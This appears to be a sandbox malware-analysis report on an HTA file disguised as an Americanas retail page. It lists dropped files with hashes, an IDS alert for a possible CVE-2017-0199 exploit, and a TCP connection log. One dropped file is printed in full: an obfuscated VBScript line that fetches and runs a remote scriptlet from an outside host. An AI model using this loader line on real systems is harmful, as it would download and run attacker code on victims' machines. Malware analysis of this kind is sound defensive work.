                                                                                                                                                                                                                                Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[9442],{26311:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var o,i=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const r=function(e){return i.createElement("svg",a({viewBox:"0 0 18 11","aria-labelledby":"arrowIcon arrowDesc"},e),o||(o=i.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},78364:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var o,i,a=n(32735);function r(){return(r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const c=function(e){return a.createElement("svg",r({viewBox:"0 0 25 25","aria-labelledby":"handtalkIcon handtalkDesc"},
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):148863
                                                                                                                                                                                                                                Entropy (8bit):5.505254113901523
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:O/+63VZkqUOuZOf9VZgF4GZyFg3VnfS1fxDibXE6k3XHoH/WTT6u2:OW63V+xOuqV3HgQ1p+M3XHPN2
                                                                                                                                                                                                                                MD5:D31F05B0617CF851CAEC52A9F66BFEA7
                                                                                                                                                                                                                                SHA1:E54BB363EB0E93D6F85A9DAB42A502E8DA0AA3EA
                                                                                                                                                                                                                                SHA-256:455449EE12DDBAB0D9690306ECED77A72CC560B8AF0649AB3EBE84E801E8FD71
                                                                                                                                                                                                                                SHA-512:7D490199EE73C6ECED0F655314F207AD907ED1FD89F9126819540765D7B288224FF4D71B08E340CE418BDA7DADE7480E2CE752A0CD1345712F932DE0DB5FB1CC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[6965,4446,9458,7736,7662,8773,5369],{26311:(e,n,t)=>{"use strict";t.d(n,{Z:()=>r});var i,o=t(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e}).apply(this,arguments)}const r=function(e){return o.createElement("svg",a({viewBox:"0 0 18 11","aria-labelledby":"arrowIcon arrowDesc"},e),i||(i=o.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},96767:(e,n,t)=>{"use strict";t.d(n,{Z:()=>r});var i,o=t(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e}).apply(this,arguments)}const r=function(e){return o.createElement("svg",a({viewBox:"0 0 24 32","aria-labelledby":"
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8228)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8321
                                                                                                                                                                                                                                Entropy (8bit):5.294678907318697
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:3bIpMVRrGnY+qdpZHmJECQdR2VCy2QDR2CCzg:9rGnypZHpdR2VCy1DR2CCzg
                                                                                                                                                                                                                                MD5:98127D478753B944FDDE1270176F2917
                                                                                                                                                                                                                                SHA1:0FAA7BBCD58224B16AF02D8B6AC491205B1C3DAC
                                                                                                                                                                                                                                SHA-256:E69F7E4B00FBFE16B1929A0FD6608313425D73EDD934583132DBF3CB8C9A578E
                                                                                                                                                                                                                                SHA-512:AF816A8F0586CA1663B5E8E624415E2F4A7BA2CD0587AFBB32E55D8042619F01614F98DB3B7064394F8C3A60116C6580EE977D13F7B7E08D48B28718B36B472B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5901],{40848:(e,t,o)=>{o.d(t,{Q:()=>A});var n,r=o(20011),i=o(8821),a=o(85169),d=o(93173),l=o(82248),s=o(46647),c=o(32735),u=o(12788),g=/^-?\d*\.?\d+(px|%)$/;function p(e,t){return Array.isArray(e)&&Array.isArray(t)&&e.length===t.length?e.some((function(o,n){return p(e[n],t[n])})):e!==t}var f=(n=Object.prototype).hasOwnProperty,v=n.toString;function h(e){return e&&f.call(e,"ref")}var w=new Map;function b(e){void 0===e&&(e={});for(var t,o=e.root||null,n=function(e){var t=(e?e.trim():"0px").split(/\s+/).map((function(e){if(!g.test(e))throw new Error("rootMargin must be a string literal containing pixels and/or percent values");return e})),o=t.shift(),n=t[0],r=void 0===n?o:n,i=t[1],a=void 0===i?o:i,d=t[2];return o+" "+r+" "+a+" "+(void 0===d?r:d)}(e.rootMargin),r=Array.isArray(e.threshold)?e.threshold:[null!=e.threshold?e.threshold:0],i=w.keys();t=i.next().value;){if(!(o!==t.root||n!==t.rootMargin||p(
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6788)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6882
                                                                                                                                                                                                                                Entropy (8bit):5.287000980875957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:nKKmYGrF+dinRfe4fY7IpfWAbKvfrdcBYDAmYkYDymX0VFceUDtRMb/AtRMQc:nlmwg9Y7e3uZWYr/YymX0YDhR/RU
                                                                                                                                                                                                                                MD5:685F3EAA88CD84793FF809193388D049
                                                                                                                                                                                                                                SHA1:125250B977A6C4CCCD39B41C94B6B84E517549DC
                                                                                                                                                                                                                                SHA-256:2A603005CA16220909E0A87AC2A9D38E797E6E6694C5E53F85BCB3A505856B35
                                                                                                                                                                                                                                SHA-512:BB153168FC91F0FFD990BBCE1E3DFAAA0F10D1BFE99F458FCCF0CBD47421896E0EE0EE45EE00114972B5AD0C1CB0B0E591399DE4133A8CF923569192E425780F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[863],{23970:(t,e,n)=>{n.d(e,{n:()=>C});var r=n(20011),o=n(32735),a=n(56875),i=o.createElement,c=function(t){var e=t.styles,n=void 0===e?{}:e,r=t.children,o=n.textAlign||n.align;return i("p",{className:"text",style:{textAlign:o||"initial",fontSize:14}},r)},u=o.createElement,l=function(t){var e=t.type,n=t.children;return"wrapper-ordered-list-item"===e?u("ol",{style:{listStyle:"decimal",fontSize:14}},n):u("ul",{style:{listStyle:"disc",fontSize:14}},n)},s=o.createElement,d=function(t){var e=t.children;return s("li",{style:{listStyle:"inherit"}},e)},f=o.createElement,p=function(t){var e=t.type,n=t.children;switch(e){case"header-one":return f("h1",{style:{fontSize:"22px",fontWeight:"bold"}},n);case"header-two":return f("h2",{style:{fontSize:"18px",fontWeight:"bold"}},n);case"header-three":return f("h3",{style:{fontSize:"16px",fontWeight:"bold"}},n)}return f("h1",{style:{fontSize:"22px",fontWeight:"bold"
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12382)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12476
                                                                                                                                                                                                                                Entropy (8bit):5.394946879527314
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:B1V067CXDOXj09tmco2kGXzwz8FQ/RIKB7:BDR73cRXzwwy/OKR
                                                                                                                                                                                                                                MD5:401635181132CBA3784868D7AC1CDDB9
                                                                                                                                                                                                                                SHA1:6A92E910F53A5C851C6E9E65EA3B408B4DB4C463
                                                                                                                                                                                                                                SHA-256:94D1AFBEFB2D30DB4899367A2164F18D106578658A50A061159E35C6A7D1E7D4
                                                                                                                                                                                                                                SHA-512:B70D6B8A6AFFCC8651EAE1E86D14E340046EBD2EB7F8F8E25D90EA17AED46C0D769F1067DA86098381E0A45AC1083A1AD87EEC8B6F52DAB1B15148951AF798B7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[232],{3126:(t,e,n)=>{"use strict";n.d(e,{Z:()=>o});var r,i=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t}).apply(this,arguments)}const o=function(t){return i.createElement("svg",a({fill:"#F80032",width:25,height:25,viewBox:"0 0 25 25",xmlns:"http://www.w3.org/2000/svg"},t),r||(r=i.createElement("path",{d:"M7.897 4.658a.762.762 0 011.077-1.077l8.38 8.38.001.001a.762.762 0 010 1.077L8.974 21.42a.762.762 0 11-1.077-1.077l7.842-7.842-7.842-7.843z"})))}},45750:(t,e,n)=>{var r=n(85973),i=n(28148),a=n(78746),o=Math.max,s=Math.min;t.exports=function(t,e,n){var l,c,u,f,h,d,p=0,m=!1,v=!1,g=!0;if("function"!=typeof t)throw new TypeError("Expected a function");function w(e){var n=l,r=c;return l=c=void 0,p=e,f=t.apply(r,n)}function y(t){return p=t,h=setTimeout
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1296 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10907
                                                                                                                                                                                                                                Entropy (8bit):7.935173541531513
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:FSAj+8mpMrmPke8jIYJFIL7eGVcrEXdHAzypAvcYTvWy+r8u6i3rY:kROmHy7DIL7evetAEYTvB+r8e3M
                                                                                                                                                                                                                                MD5:5C15B404F306E96E2023FF22B0533758
                                                                                                                                                                                                                                SHA1:A62C74E2015E6D72281F744067DCA1A3942A21F0
                                                                                                                                                                                                                                SHA-256:B05DCE878DAC18693B76C83B5F7A154F9C3B9D5D3279B7C0DDADBF76D2F56EEE
                                                                                                                                                                                                                                SHA-512:C6995037208480BFC3E645156935676870DCF346B491DBA333E7C96CCD648E1ED085D483FCDA9AAD49E29F7EEE73E03FB6C8FE4A301D72AF4960A4BFF38198A0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......6......Q......pHYs............... .IDATx..ml[W.....4#&...Zk..e..(..h(@#...h..t.."2...<h.....2......-".i.;V..B16...2.(:...5.t.Q......J+...2t."y...\.s_.&J.......s.y?...}^4].u.B.!..B.!..B....- ..B.!..B.!.|y....B.!..B.!........B.!..B.!..W.@$..B.!..B.!..B."!..B.!..B.!..*..!..B.!..B.!.P.H.!..B.!..B.q..DB.!..B.!..B.+T .B.!..B.!..B\....B.!..B.!........B.!..B.!..W.@$..B.!..B.!..B."!..B.!..B.!..*..!..B.!..B.!.P.H.!..B.!..B.q... ../....PN.0........5..m.t.=..y.....w...n.W.Jf...*<.W....o.......AOO.N.:...?|...l.}}}......ggg.....D....~..T2s.......{.|......y...z..........6%....naS.VQ...t3..v*.y...]....'..u........6.5T>........E#;."B.v...S..y.B....P( ...H........'.K..{(_...x.w?J.l..![.....M...+..Jf...W.....Z.t.....wI...P.Z0....!.E%3..tF....W._..[..J.ya.^*.....\..b.{..r../..\MY./.B_z...7.sB..0."!dK(.}o.....t,i..s;....<...J.....hI.......0,1<._.....u..........N7..R.s.@...b.......B."!dK.sy.....B..P...*@.H..!.....Q...E.!.....t..A...t..F|........o t
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1330
                                                                                                                                                                                                                                Entropy (8bit):7.568904066084465
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:kZbldWaA3k2itJ5L2cJYPva2/tarY6YRf2gCkSl6LXlT5HGIVUKcS5:kZxAaWk2GLlJYXJtUdYdLCk3D5zeQ
                                                                                                                                                                                                                                MD5:92C77E9D7DA4914BFADEC931F94AEB2C
                                                                                                                                                                                                                                SHA1:1B1D9E6BC510EC8E6C70360D36E42749F0971A1C
                                                                                                                                                                                                                                SHA-256:7B8B47F7B99AC967DF8C685B443D644A32187DC3CD352CB31823B4536F5C35EF
                                                                                                                                                                                                                                SHA-512:F7F1D7A19F3C941356ACFFAFFF3434301ACA28B30096A731A924E292F8C6041338D283F1542F29723035AEA420B8F02D5E95A984818F03ECFFE5AA55062B7A36
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:RIFFt4..WEBPVP8X...........5..ALPH..........(m.....,...O..5..._..VP8 p3...u...*..6....%7p.X...........J.b.....mH.S...g...........>.+.7.?._....|..................;.......?....p..?......3...?.x.F.......A.........O..=............_......o..._...?.?..?....*...................~............?....._.g.?%.1.r.......~ {..3........}................................!.C...O..Q...'.......}......._......D.....O......_...?..........O..e.Q.....c.O....................w.............t.....?....._....c........G...g.G..z.'.6..6..6..6..6..6..6..6..6..6..6..6..6....6.....Jn.x.t.G...C..Q.?|....\b)n4.>.e?'...j!.$..g$T~).%.C...(..l...`.?.r7._.`T....<.\..o5....@j....jm........w.\#..{.;.iN.D&....1X.....j.-21....+..rQ...8^h.....h.Y....yY..7.[.4.....4.s..F.O\.r..T.O.&@..R..=d|.p.4......MW......m..m..m..m..m...>O...0.....>...v^.-.$....v..I..}...4U.c.^.^X.B...0.B..O....0.n....10...J...._.Pm._.v.La.....Y.`....>...k.\.............{.E..x...t...".=nC.O.D0d2.x..v...'.6..6..6..6..6..6
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):271
                                                                                                                                                                                                                                Entropy (8bit):5.250152930854115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:kD7j1oPayjqEWXil1+UkTdGk69ukJyrUXHht8XOcHv5n:k3j0jqEWMMv5ksr4hov5
                                                                                                                                                                                                                                MD5:05F88C21A3B62133641D007516237440
                                                                                                                                                                                                                                SHA1:8932D42C5ABC16091EE9D1F5CC99BBF992E9552F
                                                                                                                                                                                                                                SHA-256:2F0A789567FA67B2429FA528EC95CE9FCADEB9DF1B78636B2BBBD6F51EC8EF26
                                                                                                                                                                                                                                SHA-512:97BFFDD1AC98D5F79112E10F67F1A6BC64F79FD18B448199DECCA6F8C722FECCE719725C0B8A5809E878AFA929BE61C630E35F3F429B9FE58C11848518E3A6E2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetObject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")
                                                                                                                                                                                                                                File type:HTML document, Unicode text, UTF-8 text, with very long lines (1835)
                                                                                                                                                                                                                                Entropy (8bit):5.614851252612375
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                  File name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                                  File size:442'101 bytes
                                                                                                                                                                                                                                  MD5:74903ec7a266a9d8d2c5d96d8b9b4965
                                                                                                                                                                                                                                  SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
                                                                                                                                                                                                                                  SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
                                                                                                                                                                                                                                  SHA512:dbab53d93608b8c5d05fe32c9387396006552ed328e83908b886d921e59a69074b4ae8cbe3d80ab93b50e65a7c1ed087645b58f26a5f5c38514d6b051c72b34e
                                                                                                                                                                                                                                  SSDEEP:3072:0Al6oGlpW5P1VZuSLWlUmHpyqOOEgGmlO1gE8MCRCU65ZRoWqfx:ll6vpW59VISL+RZZrlOu
                                                                                                                                                                                                                                  TLSH:D194F8361698297E434743CDBC5BBB1662CB605BC5894AE8CAFCCF1E87A9CDE131160D
                                                                                                                                                                                                                                  File Content Preview:... <!DOCTYPE html>. <html lang="pt-BR">. <head>. <title data-react-helmet="true">Americanas - Passou, cestou :)</title>. <meta http-equiv="X-UA-Compatible" content="IE=edge" /> . <meta name="viewport" content="width=device-width, initial-scal
                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                  2024-12-23T10:28:01.038729+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224921416.12.2.60443TCP
                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.578342915 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.578428984 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.578521013 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.586745024 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.586779118 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.295865059 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.296097994 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.302644014 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.302675009 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.303148985 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.303215981 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.313971043 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:16.355376005 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.091758013 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.091835976 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.091892004 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.091948032 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.091945887 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.091945887 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.092011929 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.092056036 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.092056036 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.092056036 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.100061893 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.100147009 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.104965925 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.105053902 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.105088949 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.105149984 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.111155033 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.111218929 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.118747950 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.118818045 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.123668909 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.123739958 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.211460114 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.211534023 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.215708971 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.215775013 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.278033972 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.278234005 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.283713102 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.283790112 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.288166046 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.288240910 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.289443970 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.289515018 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.297182083 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.297251940 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.298676968 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.298748970 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.306346893 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.306415081 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.312119007 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.312194109 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.315850019 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.315921068 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.325694084 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.325790882 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.329576969 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.329643011 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.339222908 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.339293957 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.342777014 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.342938900 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.352754116 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.352847099 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.356349945 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.356415033 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.365525007 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.365591049 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.369095087 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.369158030 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.378228903 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.378293991 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.381891012 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.381951094 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.390964985 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.391053915 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.397533894 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.397607088 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.403856993 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.404050112 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.405888081 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.405949116 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.416465044 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.416630983 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.416647911 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.416671038 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.416702986 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.416737080 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.475903988 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.476080894 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.476089001 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.476114988 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.476149082 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.476169109 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.478019953 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.478095055 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.482419968 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.482494116 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.482568026 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.482629061 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.486772060 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.486843109 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.488734961 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.488809109 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.488877058 CET44349168142.250.181.130192.168.2.22
